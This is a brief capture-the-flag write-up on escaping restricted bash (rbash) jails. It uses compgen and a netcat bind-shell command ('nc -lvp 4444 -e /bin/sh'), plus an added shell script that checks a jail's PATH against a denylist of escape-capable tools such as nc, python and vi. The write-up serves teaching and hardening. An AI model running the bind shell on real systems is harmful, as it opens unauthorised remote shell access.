jail
rbash warmup
Solved By : thewhiteh4t
We can use compgen to check for available commands:
compgen -c
Another way is to use echo.
The known way of escaping with nc is to get a shell on our “attacker” box, but in this challenge we are not allowed to connect to remote machines, so we are left with localhost.
This is actually easier:
nc -lvp 4444 -e /bin/sh &
Now we can connect to it!
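To check a restricted shell for this kind of escape before deploying it, the commands on its PATH can be compared with a denylist of tools that can start another program. This is an added example, not part of the original writeup; the denylist, the function names and the sample jail directory are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit a restricted shell's PATH for shell-escape-capable tools.

# Constructed, non-exhaustive denylist (an assumption, extend per site):
# shells, interpreters, and tools that can execute another program,
# such as nc with its -e option as used above.
RISKY="sh bash dash zsh nc ncat netcat vi vim ed awk find man less python python3 perl ruby env ssh"

# list_commands PATH_STRING
# Print the name of every executable file in the colon-separated directories,
# i.e. the external commands that `compgen -c` would report.
list_commands() {
    old_ifs=$IFS
    IFS=:
    for dir in $1; do
        IFS=$old_ifs
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            if [ -f "$f" ] && [ -x "$f" ]; then
                echo "${f##*/}"
            fi
        done
    done
    IFS=$old_ifs
    return 0
}

# risky_commands PATH_STRING
# Print, sorted and one per line, the available commands found on the denylist.
risky_commands() {
    list_commands "$1" | sort -u | while read -r name; do
        case " $RISKY " in
            *" $name "*) echo "$name" ;;
        esac
    done
}

# make_sample_jail: build a constructed jail bin directory and print its path.
make_sample_jail() {
    jail=$(mktemp -d)
    for name in ls cat nc vi; do
        printf '#!/bin/sh\n' > "$jail/$name"
        chmod +x "$jail/$name"
    done
    printf 'notes\n' > "$jail/readme.txt"   # not executable, so ignored
    echo "$jail"
}

sample=$(make_sample_jail)
echo "Escape-capable commands on PATH=$sample:"
risky_commands "$sample"
rm -rf "$sample"
```

Any name it prints should be removed from the jail's PATH or replaced with a build that lacks the program-execution feature.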
rbash yet another calculator
Solved By : thewhiteh4t
The challenge mentions that the filename has been changed this time, but it is in the same working directory, so we can again use echo to check the file name.
Just google “echo read file”.